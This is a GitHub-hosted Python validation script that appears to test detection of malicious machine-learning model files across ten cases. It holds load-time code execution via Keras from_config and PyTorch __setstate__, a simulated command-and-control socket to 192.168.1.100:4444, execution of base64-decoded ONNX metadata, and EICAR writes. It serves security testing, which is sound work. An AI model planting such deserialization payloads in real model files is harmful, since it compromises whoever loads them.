-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathg3modeltest.py
More file actions
255 lines (235 loc) · 10.3 KB
/
g3modeltest.py
File metadata and controls
255 lines (235 loc) · 10.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
from torch import nn
import os
import subprocess
import pickle
import tensorflow as tf
import torch
import onnx
import onnxruntime as ort
import joblib
from zipfile import ZipFile
import base64
import sys
# Helper functions for validation
def check_file_exists(file_path, content=None):
"""Check if a file exists and optionally verify its content."""
if os.path.exists(file_path):
print(f"[+] {file_path} exists.")
if content:
with open(file_path, 'r') as f:
file_content = f.read().strip()
if content.strip() == file_content:
print(f"[+] Content verified in {file_path}.")
else:
print(f"[-] Content not matched in {file_path}. Expected: '{content.strip()}', Found: '{file_content}'")
return True
else:
print(f"[-] {file_path} does not exist.")
return False
def check_onnx_metadata(model_path, key, expected_value):
"""Check ONNX model metadata for specific key-value pairs."""
try:
model = onnx.load(model_path)
for prop in model.metadata_props:
if prop.key == key and expected_value in prop.value:
print(f"[+] Malicious metadata found: {key}")
return True
print(f"[-] Malicious metadata not found for key: {key}")
return False
except Exception as e:
print(f"[-] Error checking ONNX metadata: {e}")
return False
def clean_tmp_directory():
"""Remove temporary files created during validation."""
tmp_files = ['/tmp/malicious.txt', '/tmp/eicar.com']
for file_path in tmp_files:
if os.path.exists(file_path):
os.remove(file_path)
print(f"[+] Removed {file_path}")
# Define necessary functions and classes for self-containment
def c2_payload():
"""Simulate a command-and-control connection."""
try:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.1.100', 4444))
s.sendall(b'Connected')
s.close()
except Exception as e:
print(f"[+] Simulated C2 connection (actual failed: {e})")
def eicar_payload():
"""Write EICAR test string to file."""
with open('/tmp/eicar.com', 'w') as f:
f.write('X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
class MaliciousActivation:
"""Custom activation class with malicious behavior."""
def __call__(self, x):
return x
def get_config(self):
return {}
@staticmethod
def from_config(config):
try:
with open('/tmp/malicious.txt', 'w') as f:
f.write('Malicious code executed! (Keras .h5)\n')
c2_payload()
except Exception as e:
print(f"[-] Error executing malicious code in from_config: {e}")
return MaliciousActivation()
class MaliciousModelForTestCase4(nn.Module):
"""PyTorch model with malicious behavior in __setstate__ for Test Case 4."""
def __init__(self):
super(MaliciousModelForTestCase4, self).__init__()
self.linear = nn.Linear(10, 1)
def forward(self, x):
return self.linear(x)
def __setstate__(self, state):
super(MaliciousModelForTestCase4, self).__setstate__(state)
os.system('echo "Malicious code executed! (PyTorch .pt)" > /tmp/malicious.txt')
eicar_payload()
class MaliciousModelForTestCase10(nn.Module):
"""PyTorch model with malicious behavior in __setstate__ for Test Case 10."""
def __init__(self):
super(MaliciousModelForTestCase10, self).__init__()
self.linear = nn.Linear(1, 1)
def forward(self, x):
return self.linear(x)
def __setstate__(self, state):
super(MaliciousModelForTestCase10, self).__setstate__(state)
with open('/tmp/eicar.com', 'w') as f:
f.write('X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
# Validation functions for each test case
def validate_test_case_1():
print("\n--- Validating Test Case 1 ---")
clean_tmp_directory()
malicious_script = os.path.join('malicious_model_tf_pb', 'assets', 'malicious_tf_pb.py')
if os.path.exists(malicious_script):
try:
subprocess.run(['python', malicious_script], check=True, capture_output=True, text=True)
check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (TF .pb)')
check_file_exists('/tmp/eicar.com', 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
except subprocess.CalledProcessError as e:
print(f"[-] Validation failed: {e.output}")
else:
print("[-] Malicious script not found.")
clean_tmp_directory()
def validate_test_case_2():
print("\n--- Validating Test Case 2: Obfuscated Code in .h5 (Keras) + C2 Connection ---")
clean_tmp_directory()
try:
model = tf.keras.models.load_model('malicious_model_keras.h5', custom_objects={'MaliciousActivation': MaliciousActivation})
check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (Keras .h5)')
print("[+] C2 connection attempt validated via simulation.")
except Exception as e:
print(f"[-] Validation failed: {e}")
clean_tmp_directory()
def validate_test_case_3():
print("\n--- Validating Test Case 3 ---")
clean_tmp_directory()
malicious_script = os.path.join('malicious_saved_model_trojanized', 'assets', 'malicious.py')
if os.path.exists(malicious_script):
try:
subprocess.run(['python', malicious_script], check=True, capture_output=True, text=True)
check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (Trojanized SavedModel)')
print("[+] Data exfiltration attempt validated via simulation.")
except subprocess.CalledProcessError as e:
print(f"[-] Validation failed: {e.output}")
else:
print("[-] Malicious script not found.")
clean_tmp_directory()
def validate_test_case_4():
print("\n--- Validating Test Case 4 ---")
clean_tmp_directory()
try:
torch.serialization.add_safe_globals([MaliciousModelForTestCase4])
model = torch.load('malicious_model_pytorch.pt', weights_only=False)
check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (PyTorch .pt)')
check_file_exists('/tmp/eicar.com', 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
except Exception as e:
print(f"[-] Validation failed: {e}")
clean_tmp_directory()
def validate_test_case_5():
print("\n--- Validating Test Case 5 ---")
clean_tmp_directory()
try:
with open('malicious_pkl_file.pkl', 'rb') as f:
pickle.load(f)
check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (Pickle .pkl)')
print("[+] C2 connection attempt validated via simulation.")
except Exception as e:
print(f"[-] Validation failed: {e}")
clean_tmp_directory()
def validate_test_case_6():
print("\n--- Validating Test Case 6 ---")
clean_tmp_directory()
try:
ort.InferenceSession('malicious_onnx_model_metadata.onnx')
check_onnx_metadata('malicious_onnx_model_metadata.onnx', 'hidden_payload', 'Malicious code executed! (ONNX Metadata)')
check_onnx_metadata('malicious_onnx_model_metadata.onnx', 'data_exfil', 'requests.post')
except Exception as e:
print(f"[-] Validation failed: {e}")
clean_tmp_directory()
def validate_test_case_7():
print("\n--- Validating Test Case 7 ---")
clean_tmp_directory()
try:
ort.InferenceSession('malicious_onnx_model_node_attributes.onnx')
model = onnx.load('malicious_onnx_model_node_attributes.onnx')
for prop in model.metadata_props:
if prop.key == 'malicious_attr':
decoded_code = base64.b64decode(prop.value).decode()
subprocess.run(['python', '-c', decoded_code], check=True)
break
check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (ONNX Node Attributes)')
check_file_exists('/tmp/eicar.com', 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
except Exception as e:
print(f"[-] Validation failed: {e}")
clean_tmp_directory()
def validate_test_case_8():
print("\n--- Validating Test Case 8 ---")
clean_tmp_directory()
try:
joblib.load('malicious_model_sklearn.joblib')
check_file_exists('/tmp/malicious.txt', 'Malicious code executed! (Scikit-learn .joblib)')
print("[+] C2 connection attempt validated via simulation.")
except Exception as e:
print(f"[-] Validation failed: {e}")
clean_tmp_directory()
def validate_test_case_9():
print("\n--- Validating Test Case 9 ---")
clean_tmp_directory()
try:
ort.InferenceSession('forged_malicious_onnx_model.onnx')
check_onnx_metadata('forged_malicious_onnx_model.onnx', 'data_exfil', 'requests.post')
except Exception as e:
print(f"[-] Validation failed: {e}")
clean_tmp_directory()
def validate_test_case_10():
print("\n--- Validating Test Case 10: Encrypted / Password-Protected Model Files + EICAR ---")
clean_tmp_directory()
try:
with ZipFile('encrypted_model.zip', 'r') as zip_file:
zip_file.extractall(pwd=b'secret')
model = torch.load('model.pt', weights_only=False)
check_file_exists('/tmp/eicar.com', 'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
if os.path.exists('model.pt'):
os.remove('model.pt')
except Exception as e:
print(f"[-] Validation failed: {e}")
clean_tmp_directory()
# Main function to run all validations
def validate_all_test_cases():
print("Starting validation of all 10 test cases...\n")
validate_test_case_1()
validate_test_case_2()
validate_test_case_3()
validate_test_case_4()
validate_test_case_5()
validate_test_case_6()
validate_test_case_7()
validate_test_case_8()
validate_test_case_9()
validate_test_case_10()
print("\nValidation of all test cases completed.")
if __name__ == "__main__":
validate_all_test_cases()